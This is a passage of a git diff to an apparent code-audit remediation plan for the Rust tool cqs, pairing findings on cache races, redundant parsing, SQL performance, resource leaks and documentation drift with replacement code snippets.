+Then update read/write sites: `read_batch`, `write_batch`, `evict()` queries — every site that touches the cache must bind `purpose`. Find all sites with `grep -n 'embedding_cache' src/cache.rs`.
+
+### Notes
+
+This is a cache schema migration — bumps embedding_cache schema version (separate from main `chunks` schema v22). Document in CHANGELOG. Old cache rows ALTER-defaulted to `'embedding'` is correct because `embedding_base` cache writes have never happened (the audit confirms PR #1040 only writes `embedding`). After this lands, writers that want to cache `embedding_base` pass `purpose='embedding_base'` and lookups disambiguate.
+
+---
+
+## P2.66 — Cache evict() vs write_batch() race
+
+**Finding:** P2.66 in audit-triage.md
+**Files:** `src/cache.rs:354-460`
+**Why:** `evict()` holds `evict_lock` mutex; `write_batch()` does NOT. Under WAL, evict's BEGIN takes a snapshot; concurrent commit between SELECT-size and DELETE deletes just-inserted rows.
+
+### Current code
+
+`src/cache.rs:354-398` (`write_batch` opens a transaction without `evict_lock`):
+
+```rust
+    pub fn write_batch(
+        &self,
+        entries: &[(&str, &[f32])],
+        model_fingerprint: &str,
+        dim: usize,
+    ) -> Result<usize, CacheError> {
+        // ... no evict_lock acquisition ...
+        self.rt.block_on(async {
+            let mut tx = self.pool.begin().await?;
+            // ...
+        })
+    }
+```
+
+`src/cache.rs:408-416` (`evict` acquires `evict_lock`):
+
+```rust
+    pub fn evict(&self) -> Result<usize, CacheError> {
+        let _span = tracing::info_span!("cache_evict").entered();
+        let _guard = self
+            .evict_lock
+            .lock()
+            .unwrap_or_else(|poisoned| poisoned.into_inner());
+        self.rt.block_on(async { /* ... */ })
+    }
+```
+
+### Replacement
+
+Acquire `evict_lock` in `write_batch` too (same pattern):
+
+```rust
+    pub fn write_batch(
+        &self,
+        entries: &[(&str, &[f32])],
+        model_fingerprint: &str,
+        dim: usize,
+    ) -> Result<usize, CacheError> {
+        // DS-V1.30: hold evict_lock across writes too so concurrent evict()
+        // can't measure size, then delete rows committed by an in-flight
+        // write_batch between its SELECT and DELETE. Without this, a writer
+        // sees its INSERT succeed while a cross-session read sees a cache
+        // miss — silently re-embedding chunks the cache "should" have.
+        let _evict_guard = self
+            .evict_lock
+            .lock()
+            .unwrap_or_else(|poisoned| poisoned.into_inner());
+
+        let _span = tracing::info_span!(/* existing */).entered();
+        // ... rest unchanged
+    }
+```
+
+### Notes
+
+Per-batch lock is cheap. Verify naming (`evict_lock` field) by reading `EmbeddingCache` struct definition. If the lock name differs (e.g. `write_lock`), align. Add a regression test that spawns concurrent `write_batch` + `evict` and asserts no row written by `write_batch` is deleted by the racing `evict`.
+
+---
+
+## P2.67 — reindex_files double-parses calls per chunk
+
+**Finding:** P2.67 in audit-triage.md
+**Files:** `src/cli/watch.rs:2815, 2930-2939`
+**Why:** Watch path uses `parse_file_all` (returns file-level `calls`), then re-runs `extract_calls_from_chunk` per chunk. Bulk pipeline already uses `parse_file_all_with_chunk_calls`. ~14k extra tree-sitter parses per repo-wide reindex.
+
+### Current code
+
+`src/cli/watch.rs:2815, 2930-2939`:
+
+```rust
+            match parser.parse_file_all(&abs_path) {
+                Ok((mut file_chunks, calls, chunk_type_refs)) => {
+                    /* ... */
+                    if let Err(e) = store.upsert_function_calls(rel_path, &calls) { /* ... */ }
+                    file_chunks
+                }
+                /* ... */
+            }
+        })
+        .collect();
+
+    /* ... */
+
+    // DS-2: Extract call graph from chunks (same loop), then use atomic upsert.
+    let mut calls_by_id: HashMap<String, Vec<cqs::parser::CallSite>> = HashMap::new();
+    for chunk in &chunks {
+        let calls = parser.extract_calls_from_chunk(chunk);
+        if !calls.is_empty() {
+            calls_by_id
+                .entry(chunk.id.clone())
+                .or_default()
+                .extend(calls);
+        }
+    }
+```
+
+### Replacement
+
+Switch the inner parse to `parse_file_all_with_chunk_calls`. The fourth tuple element is `Vec<(String, CallSite)>` keyed by absolute-path chunk id; rewrite ids using the same prefix-strip the watch path already does for `chunk.id`, then build `calls_by_id` from the returned chunk_calls without re-parsing.
+
+```rust
+            match parser.parse_file_all_with_chunk_calls(&abs_path) {
+                Ok((mut file_chunks, calls, chunk_type_refs, chunk_calls)) => {
+                    /* path rewrite block unchanged */
+                    let abs_norm = cqs::normalize_path(&abs_path);
+                    let rel_norm = cqs::normalize_path(rel_path);
+                    for chunk in &mut file_chunks {
+                        chunk.file = rel_path.clone();
+                        if let Some(rest) = chunk.id.strip_prefix(abs_norm.as_str()) {
+                            chunk.id = format!("{}{}", rel_norm, rest);
+                        }
+                    }
+                    if !chunk_type_refs.is_empty() {
+                        all_type_refs.push((rel_path.clone(), chunk_type_refs));
+                    }
+                    if let Err(e) = store.upsert_function_calls(rel_path, &calls) { /* ... */ }
+                    // Stash chunk-level calls keyed by the post-rewrite chunk id.
+                    for (abs_chunk_id, call) in chunk_calls {
+                        let chunk_id = match abs_chunk_id.strip_prefix(abs_norm.as_str()) {
+                            Some(rest) => format!("{}{}", rel_norm, rest),
+                            None => abs_chunk_id,
+                        };
+                        per_file_chunk_calls.push((chunk_id, call));
+                    }
+                    file_chunks
+                }
+                /* ... */
+            }
+```
+
+Replace the per-chunk `extract_calls_from_chunk` loop with a fold over the collected `per_file_chunk_calls`:
+
+```rust
+    let mut calls_by_id: HashMap<String, Vec<cqs::parser::CallSite>> = HashMap::new();
+    for (chunk_id, call) in per_file_chunk_calls {
+        calls_by_id.entry(chunk_id).or_default().push(call);
+    }
+```
+
+### Notes
+
+`per_file_chunk_calls` needs to be a top-level `Vec<(String, CallSite)>` accumulator outside the `flat_map`, or threaded via `(file_chunks, Vec<(String, CallSite)>)` tuples. Inspect actual loop shape in watch.rs before applying — the `.collect()` at line 2866 may need restructuring.
+
+---
+
+## P2.68 — reindex_files watch path bypasses global EmbeddingCache
+
+**Finding:** P2.68 in audit-triage.md
+**Files:** `src/cli/watch.rs:2876-2887` vs `src/cli/pipeline/embedding.rs:39-62`
+**Why:** Watch path only checks `store.get_embeddings_by_hashes`; never sees the per-project `EmbeddingCache` from #1105. File saves in watch mode pay GPU cost for every chunk not in current slot's `chunks.embedding`.
+
+### Current code
+
+`src/cli/watch.rs:2876-2887`:
+
+```rust
+    // Check content hash cache to skip re-embedding unchanged chunks
+    let hashes: Vec<&str> = chunks.iter().map(|c| c.content_hash.as_str()).collect();
+    let existing = store.get_embeddings_by_hashes(&hashes)?;
+
+    let mut cached: Vec<(usize, Embedding)> = Vec::new();
+    let mut to_embed: Vec<(usize, &cqs::Chunk)> = Vec::new();
+    for (i, chunk) in chunks.iter().enumerate() {
+        if let Some(emb) = existing.get(&chunk.content_hash) {
+            cached.push((i, emb.clone()));
+        } else {
+            to_embed.push((i, chunk));
+        }
+    }
+```
+
+### Replacement
+
+Plumb `Option<&EmbeddingCache>` through `cmd_watch` → `WatchConfig` → `reindex_files`. Replace the manual two-tier check with `prepare_for_embedding` from the bulk pipeline:
+
+```rust
+    use crate::cli::pipeline::embedding::prepare_for_embedding;
+    let prep = prepare_for_embedding(
+        &chunks,
+        store,
+        config.global_cache, // Option<&EmbeddingCache>
+        embedder.model_fingerprint(),
+        embedder.dim(),
+    )?;
+    let cached = prep.cached;
+    let to_embed = prep.to_embed;
+```
+
+(Adapt to the actual `prepare_for_embedding` return shape — read `src/cli/pipeline/embedding.rs:39-82` to confirm the API.)
+
+### Notes
+
+This consolidates P2.67, P2.68, P3.41, P3.42, P3.46 — all watch reindex hot path issues. Verifier may bundle as one PR. The `WatchConfig` struct at `src/cli/watch.rs:572` needs a new field for the global cache. Lifetime threading: `EmbeddingCache` is owned by `cmd_watch`, borrowed for the watch loop's lifetime — straightforward.
+
+---
+
+## P2.69 — wrap_value deep-clones via serde round trip
+
+**Finding:** P2.69 in audit-triage.md
+**Files:** `src/cli/json_envelope.rs:160-176`
+**Why:** `serde_json::to_value(Envelope::ok(&payload))` walks the entire payload tree and rebuilds it. ~30KB allocator churn per gather call at 100 QPS = ~3MB/s pointless allocations.
+
+### Current code
+
+`src/cli/json_envelope.rs:160-176`:
+
+```rust
+pub fn wrap_value(payload: &serde_json::Value) -> serde_json::Value {
+    serde_json::to_value(Envelope::ok(payload)).unwrap_or_else(|e| {
+        tracing::warn!(error = %e, "wrap_value: envelope serialization failed; emitting fallback shape");
+        let owned = payload.clone();
+        serde_json::json!({
+            "data": owned,
+            "error": null,
+            "version": JSON_OUTPUT_VERSION,
         })
     })
 }
 ```
 
-The `?` converts `sqlx::Error` via `CacheError::From`; verify that impl exists (re-read `src/cache.rs:1-50` for the error enum).
+### Replacement
 
-**Why**: Current impl can return `{total_entries: 0, total_size_bytes: 0, ...}` when 3 of 5 queries failed silently — an agent reads a "healthy empty cache" when reality is "broken DB, cache unknown".
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_cache_test`.
-
----
-
-### EH-V1.29-8: Gitignore RwLock poison silently re-indexes ignored files
-
-**File**: `/mnt/c/Projects/cqs/src/cli/watch.rs`
-
-**Current code** (lines 1737, 1945):
-```rust
-let matcher_guard = gitignore.read().ok();
-let matcher_ref = matcher_guard.as_ref().and_then(|g| g.as_ref());
-```
-
-**Fix**:
-
-Recover from poison instead of silently dropping the matcher. A poisoned read lock usually means some writer panicked mid-update — the old value is still valid:
+Build the envelope as a `serde_json::Map` directly. The shallow clone of the outer payload is unavoidable when callers pass `&Value`; a follow-on can make `wrap_value` take `Value` by value to drop even that.
 
 ```rust
-// EH-V1.29-8: Recover from RwLock poison. The write side re-loads the
-// gitignore matcher from disk; if a writer panicked mid-load the reader
-// can still safely see the pre-panic matcher. Dropping to "no matcher"
-// silently re-indexes ignored files (including .env.secret).
-let matcher_guard = match gitignore.read() {
-    Ok(g) => Some(g),
-    Err(poisoned) => {
-        tracing::error!(
-            "Gitignore RwLock poisoned — recovering. Previous matcher is still valid; indexing continues with it."
-        );
-        Some(poisoned.into_inner())
-    }
-};
-let matcher_ref = matcher_guard.as_ref().and_then(|g| g.as_ref());
-```
-
-Apply at both sites (1737 startup GC, 1945 periodic GC).
-
-**Why**: Poisoned RwLock on the gitignore matcher silently degrades to "no matcher → index everything", re-ingesting secrets from `.gitignored` files into the index.
-
-**Verify**: `cargo build --features gpu-index`. Add a test in `watch::tests` that poisons the RwLock and asserts the reader still gets `Some`.
-
----
-
-### CQ-V1.29-3: `cmd_similar` private `resolve_target` diverges
-
-**File**: `/mnt/c/Projects/cqs/src/cli/commands/search/similar.rs`
-
-**Current code** (lines 16-39):
-```rust
-fn resolve_target<Mode>(store: &Store<Mode>, name: &str) -> Result<(String, String)> {
-    let (file_filter, func_name) = parse_target(name);
-    let results = store.search_by_name(func_name, 20)?;
-    if results.is_empty() {
-        bail!("No function found matching '{}'. Check the name and try again.", func_name);
-    }
-    let matched = if let Some(file) = file_filter {
-        results.iter().find(|r| {
-            let path = r.chunk.file.to_string_lossy();
-            path.ends_with(file) || path.contains(file)
-        })
-    } else {
-        None
-    };
-    let result = matched.unwrap_or(&results[0]);
-    Ok((result.chunk.id.clone(), result.chunk.name.clone()))
+pub fn wrap_value(payload: &serde_json::Value) -> serde_json::Value {
+    // PF-V1.30: build the envelope as a Map directly. Previously we ran the
+    // payload through `serde_json::to_value(Envelope::ok(&payload))` which
+    // walks the inner tree and rebuilds every Map/Vec — a deep clone
+    // disguised as a re-serialization round trip. The hot-path daemon
+    // dispatch wraps tens of KB per query at hundreds of QPS, so the
+    // deep clone is real allocator pressure.
+    let mut env = serde_json::Map::with_capacity(3);
+    env.insert("data".to_string(), payload.clone());
+    env.insert("error".to_string(), serde_json::Value::Null);
+    env.insert(
+        "version".to_string(),
+        serde_json::Value::Number(JSON_OUTPUT_VERSION.into()),
+    );
+    serde_json::Value::Object(env)
 }
 ```
 
-**Fix**:
+### Notes
 
-Replace with a call to `cqs::resolve_target` (re-exported via `crate::cli::commands::resolve::resolve_target`) so CLI and batch share the same resolution logic:
+Even better follow-on: change `wrap_value(payload: serde_json::Value) -> serde_json::Value` so the outer clone disappears entirely. Most callers (`batch/mod.rs::write_json_line`) already produce the value just-in-time. Out of scope here unless verifier wants to bundle.
+
+---
+
+## P2.70 — build_graph correlated subquery for n_callers
+
+**Finding:** P2.70 in audit-triage.md
+**Files:** `src/serve/data.rs:234-264`
+**Why:** Per-row `(SELECT COUNT(*) FROM function_calls WHERE callee_name = c.name)` is O(N × log M) where N=ABS_MAX_GRAPH_NODES, M=function_calls row count. `LEFT JOIN (... GROUP BY)` is O(M+N).
+
+### Current code
+
+`src/serve/data.rs:234-264`:
 
 ```rust
-// Delete the private resolve_target fn.
-// In cmd_similar body:
-let resolved = crate::cli::commands::resolve::resolve_target(store, name)?;
-let chunk_id = resolved.chunk_id;
-let chunk_name = resolved.name;
+        let mut node_query = "SELECT c.id, c.name, c.chunk_type, c.language, c.origin, \
+                    c.line_start, c.line_end, \
+                    COALESCE((SELECT COUNT(*) FROM function_calls fc \
+                              WHERE fc.callee_name = c.name), 0) AS n_callers_global \
+             FROM chunks c \
+             WHERE 1=1"
+            .to_string();
+        let mut binds: Vec<String> = Vec::new();
+        if let Some(file) = file_filter {
+            let escaped = file.replace('\\', "\\\\").replace('%', "\\%").replace('_', "\\_");
+            node_query.push_str(" AND c.origin LIKE ? ESCAPE '\\'");
+            binds.push(format!("{escaped}%"));
+        }
+        if let Some(kind) = kind_filter {
+            node_query.push_str(" AND c.chunk_type = ?");
+            binds.push(kind.to_string());
+        }
+        node_query.push_str(" ORDER BY n_callers_global DESC, c.id ASC LIMIT ?");
+        binds.push(effective_cap.to_string());
 ```
 
-Re-read `cqs::ResolvedTarget` shape (`src/lib.rs` has the public type definition) to confirm field names match. Delete the now-dead `fn resolve_target` above.
-
-**Why**: Private `resolve_target` picks `results[0]` (test chunks sort earlier by id); `cqs::resolve_target` in the library picks real chunks — CLI and batch/daemon return different "similar" answers for the same target.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib` + `cargo test --features gpu-index --test cli_surface_test`.
-
----
-
-### CQ-V1.29-6: `cqs doctor` reports compile-time `MODEL_NAME` constant
-
-**File**: `/mnt/c/Projects/cqs/src/cli/commands/infra/doctor.rs`
-
-**Current code** (lines 144-147, 155-156):
-```rust
-out(json, &format!(
-    "  {} Model: {} (metadata: {})",
-    "[✓]".green(),
-    cqs::embedder::model_repo(),
-    cqs::store::MODEL_NAME
-));
-```
-
-(Same pattern at :155-156 inside `check_records.push(CheckRecord::ok(...))`.)
-
-**Fix**:
-
-Read the actual `embedding_model` / `repo` key from the opened Store's metadata table instead of using the compile-time constant:
+### Replacement
 
 ```rust
-let actual_model = ctx
-    .store()
-    .metadata("embedding_model")
-    .ok()
-    .flatten()
-    .unwrap_or_else(|| "<unset>".to_string());
-
-out(json, &format!(
-    "  {} Model: {} (index metadata: {})",
-    "[✓]".green(),
-    cqs::embedder::model_repo(),
-    actual_model
-));
-check_records.push(CheckRecord::ok(
-    "runtime",
-    "model",
-    format!("{} (index metadata: {})", cqs::embedder::model_repo(), actual_model),
-));
+        // PF-V1.30: replace per-row correlated subquery with one aggregated
+        // subselect joined by name. Previously each scanned row triggered a
+        // log-N index probe into function_calls (~75k probes for a 5000-cap
+        // graph against a 30k-edge corpus). One GROUP BY pass is O(M+N).
+        let mut node_query = "SELECT c.id, c.name, c.chunk_type, c.language, c.origin, \
+                    c.line_start, c.line_end, \
+                    COALESCE(cc.n, 0) AS n_callers_global \
+             FROM chunks c \
+             LEFT JOIN (SELECT callee_name, COUNT(*) AS n \
+                        FROM function_calls GROUP BY callee_name) cc \
+               ON cc.callee_name = c.name \
+             WHERE 1=1"
+            .to_string();
 ```
 
-Confirm `Store` exposes a readable `metadata(key)` accessor (re-read `src/store/metadata.rs:1-100`); if not, thread through `repo_name()` or the equivalent setter's mirror getter.
+Rest of the function (file_filter, kind_filter, ORDER BY, LIMIT) is unchanged.
 
-**Why**: After `cqs model swap`, the index metadata points to the new model but `cqs doctor` still reports the compile-time `MODEL_NAME` — the user sees "metadata: BAAI/bge-large-en-v1.5" when the index actually holds E5-base embeddings. Doctor is specifically the command you run to detect drift.
+### Notes
 
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --test cli_doctor_fix_test`.
+`build_hierarchy` at `src/serve/data.rs:670-754` has the same shape per the audit — apply the same JOIN there. Add an explain-plan smoke test if practical, otherwise a benchmark assertion on a large fixture.
 
 ---
 
-### DOC-V1.29-1: CONTRIBUTING says "Schema v20" — actual v22
+## P2.71–P2.77, P2.92 — Resource Management cluster
 
-**File**: `/mnt/c/Projects/cqs/CONTRIBUTING.md`
-
-**Current text** (lines 193, 207):
-```
-  store/        - SQLite storage layer (Schema v20, WAL mode)
-    ...
-    migrations.rs - Schema migration framework (v10-v20, including v19 FK cascade + v20 trigger)
-```
-
-**Fix**:
-
-Re-read the actual latest schema version first (`grep -n 'SCHEMA_VERSION\|schema_version.*const\|CURRENT_SCHEMA' src/store/mod.rs src/store/migrations.rs`), then update to match. Expected: v22 per project memory. Replace:
-
-```
-  store/        - SQLite storage layer (Schema v22, WAL mode)
-    ...
-    migrations.rs - Schema migration framework (v10-v22, including v19 FK cascade, v20 trigger, v21-v22 <describe>)
-```
-
-Verify the "v19 FK cascade + v20 trigger" description is still accurate; update the brief description of v21-v22 by reading the migration function bodies.
-
-**Why**: CONTRIBUTING.md is ground truth for new contributors; wrong schema version sends them diagnosing phantom migration bugs.
-
-**Verify**: `grep -n 'Schema v' CONTRIBUTING.md` and `grep -n 'const.*SCHEMA\|CURRENT_SCHEMA\|SCHEMA_VERSION' src/store/mod.rs src/store/migrations.rs` agree.
+**Finding:** P2.71–P2.77 and P2.92 in audit-triage.md
+**Files:** Multiple — see individual sub-sections.
+**Why:** Eight resource-management findings introduced in v1.30.0. Most are independent fixes; group together because all are easy-to-medium and share the "v1.30.0 introduced bounded-resource leaks" theme.
 
 ---
 
-### DOC-V1.29-2: README missing `cqs serve` section
+### P2.71 — Background HNSW rebuild thread detached
 
-**File**: `/mnt/c/Projects/cqs/README.md`
+**File:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`)
 
-**Design spec**:
+#### Current code
 
-Add a new second-level section titled **`cqs serve` — interactive graph explorer** after the "Daemon mode" paragraph around line 835. Content outline (draft; re-read nearby section voice first):
-
-1. **Intro** (1-2 sentences): What `cqs serve` does — starts a local HTTP server on `127.0.0.1:8321` that renders call-graph / hierarchy / cluster visualizations from the index. Flagship v1.29.0 feature.
-2. **Quickstart** block:
-   ```bash
-   cqs serve
-   # Opens http://127.0.0.1:8321 in your browser (disable with --no-open).
-   ```
-3. **Views table**: enumerate `graph`, `hierarchy`, `cluster-3d`, `hierarchy-3d` with a one-line description of each.
-4. **Flags**: `--bind <addr>`, `--port <N>`, `--no-open`, `--max-nodes N`, `--read-only` (if applicable — re-read `src/cli/commands/infra/serve.rs` for actual flag names).
-5. **Security callout**: link to `SECURITY.md#cqs-serve`. Two sentences on "localhost trust" model + that SEC-1 Host-header protection is in place (post-P1 wave) but there is no auth layer.
-6. **Example workflows**:
-   - "Find dead code in a large call graph" → `cqs serve` → click hierarchy view → filter by `dead: true`.
-   - "Explore an unfamiliar module" → `cqs serve` → graph view with `file=src/store/` filter.
-
-Cross-reference from the `## Commands` TOC at the top of README. Add a bullet under the "Surfaces" section near line 56 showing `cqs serve` in the command list.
-
-**Why**: Flagship v1.29.0 feature is invisible to new users reading the README.
-
-**Verify**: Render README locally (`mdcat README.md` or GitHub preview) — confirm the new section renders, headings are at the right level, and all code blocks have language fences.
-
----
-
-### DOC-V1.29-3: README/CONTRIBUTING missing `.cqsignore`
-
-**File**: `/mnt/c/Projects/cqs/README.md` + `/mnt/c/Projects/cqs/CONTRIBUTING.md`
-
-**Design spec**:
-
-In README, find the existing `.gitignore` handling paragraph (`grep -n gitignore README.md`) and add a paragraph after it:
-
-> ### `.cqsignore`
->
-> cqs honors `.gitignore` by default. For paths you want indexed but gitignored (e.g. build artifacts containing docs), or gitignored paths you want explicitly excluded from indexing only, add patterns to `.cqsignore` at the project root. Same syntax as `.gitignore`. Takes precedence over `.gitignore` for index-specific overrides.
->
-> Example:
-> ```
-> # .cqsignore
-> !vendor/generated-docs/    # include despite .gitignore
-> tests/fixtures/huge/       # exclude from index but keep for tests
-> ```
-
-In CONTRIBUTING.md, add a bullet under the "Project Conventions" or equivalent section:
-
-> - `.cqsignore` — project-local override file for index include/exclude, syntax mirrors `.gitignore`
-
-**Why**: `.cqsignore` support exists (`grep -rn 'cqsignore' src/` confirms parsing in watch + index pipeline) but is undocumented; users hit "why isn't my file indexed" and can't find the answer.
-
-**Verify**: `grep -n 'cqsignore' README.md CONTRIBUTING.md` returns at least one hit in each.
-
----
-
-### DOC-V1.29-4: SECURITY.md wrong integrity-check default
-
-**File**: `/mnt/c/Projects/cqs/SECURITY.md`
-
-**Current text** (line 22):
-```
-3. **Database corruption**: `PRAGMA quick_check(1)` on write-mode opens (opt-out via `CQS_SKIP_INTEGRITY_CHECK=1`). Read-only opens skip the check entirely — reads cannot introduce corruption and the index is rebuildable via `cqs index --force`
-```
-
-**Fix**:
-
-Re-read `src/store/mod.rs:960-967` for the actual behavior. Current code: `opt_in = CQS_INTEGRITY_CHECK == "1"`, default is SKIP. Replace:
-
-```
-3. **Database corruption**: `PRAGMA quick_check(1)` is opt-in via `CQS_INTEGRITY_CHECK=1`. By default, integrity checks are skipped on all opens because the index is rebuildable via `cqs index --force` and the check takes ~40s on WSL `/mnt/c` (NTFS over 9P). Read-only opens skip the check entirely. Legacy `CQS_SKIP_INTEGRITY_CHECK=1` forces skip even when `CQS_INTEGRITY_CHECK=1` is set.
-```
-
-**Why**: Threat-model docs must match behavior. Current SECURITY.md advertises "default on, opt-out" but code is "default off, opt-in" — users relying on the advertised guarantee silently go unchecked.
-
-**Verify**: `grep -n 'CQS_INTEGRITY\|quick_check\|integrity' SECURITY.md src/store/mod.rs` and confirm the wording matches.
-
----
-
-### SHL-V1.29-2: `MAX_BATCH_LINE_LEN = 1 MB` blocks large diffs
-
-**File**: `/mnt/c/Projects/cqs/src/cli/batch/mod.rs`
-
-**Current code** (line 104):
-```rust
-const MAX_BATCH_LINE_LEN: usize = 1_048_576;
-```
-
-**Fix**:
-
-Raise the cap and make it env-tunable:
+`src/cli/watch.rs:1031-1042`:
 
 ```rust
-/// Maximum batch stdin line length. Default 16 MB — large enough for a ~5k-line
-/// unified diff piped through batch or daemon. Override via `CQS_BATCH_LINE_LIMIT`
-/// (bytes; setting 0 disables the cap, not recommended).
-const DEFAULT_BATCH_LINE_LIMIT: usize = 16 * 1_048_576;
+    if let Err(e) = thread_result {
+        tracing::warn!(error = %e, context, "Failed to spawn HNSW rebuild thread");
+    }
+    PendingRebuild {
+        rx,
+        delta: Vec::new(),
+        started_at,
+    }
+```
 
-fn batch_line_limit() -> usize {
-    std::env::var("CQS_BATCH_LINE_LIMIT")
+The `JoinHandle` returned by `thread_result` is `Result<JoinHandle, _>` — currently used only for the spawn-error log. Drop sites the `JoinHandle`.
+
+#### Replacement
+
+Hold the `JoinHandle` inside `PendingRebuild`. On daemon shutdown, `join()` it with a bounded timeout.
+
+```rust
+struct PendingRebuild {
+    rx: std::sync::mpsc::Receiver<RebuildOutcome>,
+    delta: Vec<(String, Embedding)>,
+    started_at: std::time::Instant,
+    handle: Option<std::thread::JoinHandle<()>>,
+}
+```
+
+```rust
+    let handle = match thread_result {
+        Ok(h) => Some(h),
+        Err(e) => {
+            tracing::warn!(error = %e, context, "Failed to spawn HNSW rebuild thread");
+            None
+        }
+    };
+    PendingRebuild { rx, delta: Vec::new(), started_at, handle }
+```
+
+On the daemon shutdown path (the `loop` exit in `cmd_watch`), join the handle before letting the daemon exit. If the audit confirms a `state.pending_rebuild.take()` happens during normal swap, this just adds shutdown handling.
+
+### Notes
+
+A bounded timeout via spinning on `JoinHandle::is_finished()` plus a final detached-drop would be the least invasive — full join needs cancellation flag plumbed through `build_hnsw_index_owned`. Audit calls out cancellation as the proper fix; mark as follow-on issue.
+
+---
+
+### P2.72 — pending_rebuild.delta unbounded
+
+**File:** `src/cli/watch.rs:611, 2667-2674, 2740-2741`
+
+#### Current code
+
+`src/cli/watch.rs:611, 623-626`:
+
+```rust
+struct PendingRebuild {
+    rx: std::sync::mpsc::Receiver<RebuildOutcome>,
+    delta: Vec<(String, Embedding)>,
+    started_at: std::time::Instant,
+}
+```
+
+The `delta.push((id, emb))` site at lines ~2667-2674 has no cap.
+
+#### Replacement
+
+Add a cap and a saturation flag:
+
+```rust
+const MAX_PENDING_REBUILD_DELTA: usize = 5_000;
+
+// at the push site:
+if let Some(ref mut pending) = state.pending_rebuild {
+    if pending.delta.len() >= MAX_PENDING_REBUILD_DELTA {
+        if !pending.delta_saturated {
+            tracing::warn!(
+                cap = MAX_PENDING_REBUILD_DELTA,
+                "pending HNSW rebuild delta saturated; abandoning in-flight rebuild — \
+                 next threshold rebuild will pick up changes from SQLite"
+            );
+            pending.delta_saturated = true;
+        }
+        // Drop newest events; the next threshold_rebuild reads from SQLite anyway.
+    } else {
+        pending.delta.push((chunk_id, embedding));
+    }
+}
+```
+
+Add `delta_saturated: bool` to `PendingRebuild`. On swap, if `delta_saturated`, abandon the rebuilt index (set `pending = None`) so we don't ship a stale snapshot.
+
+### Notes
+
+Combine with P2.71 — same struct, same surgery. Verifier should land both in one PR.
+
+---
+
+### P2.73 — LocalProvider stash retains all submitted batch results
+
+**File:** `src/llm/local.rs:74, 304-309, 542-547`
+
+#### Current code
+
+`src/llm/local.rs:304-311`:
+
+```rust
+        let results_map = results.into_inner().unwrap_or_default();
+        self.stash
+            .lock()
+            .unwrap()
+            .insert(batch_id.clone(), results_map);
+
+        Ok(batch_id)
+```
+
+#### Replacement
+
+Cap stash size and clear failed batches.
+
+```rust
+        let results_map = results.into_inner().unwrap_or_default();
+        let mut stash = self.stash
+            .lock()
+            .unwrap_or_else(|p| p.into_inner());
+
+        // Cap total stash entries — if we exceed MAX_STASH_BATCHES, evict
+        // oldest by insertion order (HashMap doesn't preserve order; switch
+        // to `IndexMap` if available, else use a `VecDeque<String>` of
+        // insertion order tracked alongside).
+        const MAX_STASH_BATCHES: usize = 128;
+        while stash.len() >= MAX_STASH_BATCHES {
+            // Pick an arbitrary key to evict — production callers fetch in FIFO
+            // order, so any non-current key is dead weight.
+            if let Some(stale_key) = stash.keys().next().cloned() {
+                stash.remove(&stale_key);
+                tracing::warn!(
+                    batch_id = %stale_key,
+                    "LocalProvider stash exceeded cap; evicting oldest entry"
+                );
+            } else {
+                break;
+            }
+        }
+        stash.insert(batch_id.clone(), results_map);
+        drop(stash);
+        Ok(batch_id)
+```
+
+Also: in the auth-fail Err arm at `:286`, explicitly `stash.remove(&batch_id)` before returning Err.
+
+### Notes
+
+The audit recommends an LRU; `MAX_STASH_BATCHES=128` is a plain cap. If `IndexMap` is not in deps, this is acceptable — the assumption is that production callers drain in submit-order so the cap rarely fires. Add a regression test that submits 200 batches without fetching, asserts `stash.len() == 128`.
+
+---
+
+### P2.74 — Daemon never checks fs.inotify.max_user_watches
+
+**File:** `src/cli/watch.rs:1947-1949`
+
+#### Current code
+
+`src/cli/watch.rs:1947-1949`:
+
+```rust
+        Box::new(RecommendedWatcher::new(tx, config)?)
+    };
+    watcher.watch(&root, RecursiveMode::Recursive)?;
+```
+
+#### Replacement
+
+Read `/proc/sys/fs/inotify/max_user_watches` at startup, count directories under `root` honoring gitignore, warn if >90% of limit.
+
+```rust
+        Box::new(RecommendedWatcher::new(tx, config)?)
+    };
+
+    // RM-V1.30: warn when the project tree approaches the inotify watch
+    // limit. notify::watch(Recursive) registers a watch per directory; on
+    // distros with the old default of 8192 a moderately-deep monorepo
+    // exhausts the limit and per-subdir registration failures are silent.
+    #[cfg(target_os = "linux")]
+    if !use_poll {
+        if let Ok(limit_str) = std::fs::read_to_string("/proc/sys/fs/inotify/max_user_watches") {
+            if let Ok(limit) = limit_str.trim().parse::<usize>() {
+                let dir_count = count_watchable_dirs(&root);
+                if dir_count * 10 > limit * 9 {
+                    tracing::warn!(
+                        dir_count,
+                        limit,
+                        "inotify watch limit nearly exhausted; consider \
+                         `cqs watch --poll` or `sudo sysctl -w fs.inotify.max_user_watches={}`",
+                        limit * 4
+                    );
+                }
+            }
+        }
+    }
+
+    watcher.watch(&root, RecursiveMode::Recursive)?;
+```
+
+```rust
+#[cfg(target_os = "linux")]
+fn count_watchable_dirs(root: &Path) -> usize {
+    let mut count = 0usize;
+    let walker = ignore::WalkBuilder::new(root)
+        .hidden(false)
+        .build();
+    for entry in walker.flatten() {
+        if entry.file_type().is_some_and(|t| t.is_dir()) {
+            count += 1;
+        }
+    }
+    count
+}
+```
+
+### Notes
+
+`ignore::WalkBuilder` is already a dep (used elsewhere). The alternative — manually descending and registering only non-ignored dirs — is the audit's recommended deeper fix; mark as follow-on issue.
+
+---
+
+### P2.75 — select_provider triggers CUDA probe + symlink ops on every CLI process
+
+**File:** `src/embedder/provider.rs:171-248`, `src/embedder/mod.rs:312-313`
+
+#### Current code
+
+`src/embedder/provider.rs:171-173`:
+
+```rust
+pub(crate) fn select_provider() -> ExecutionProvider {
+    *CACHED_PROVIDER.get_or_init(detect_provider)
+}
+```
+
+`Embedder::new` (`src/embedder/mod.rs:312-313`) calls `select_provider()` unconditionally during construction — even on `cqs notes list` / `cqs slot list` / etc. that never run an inference.
+
+#### Replacement
+
+Defer the probe to first inference. Replace eager `select_provider()` call in `Embedder::new` with a lazy `OnceLock<ExecutionProvider>` populated in `Session::create_session`.
+
+The minimal change: introduce `Embedder::provider_lazy()` that calls `select_provider()` on first use, and have `embed_query`/`embed_documents` route through it. `Embedder::new` stops eagerly resolving the provider.
+
+```rust
+// In Embedder struct:
+provider: std::sync::OnceLock<ExecutionProvider>,
+
+// New helper:
+fn provider(&self) -> ExecutionProvider {
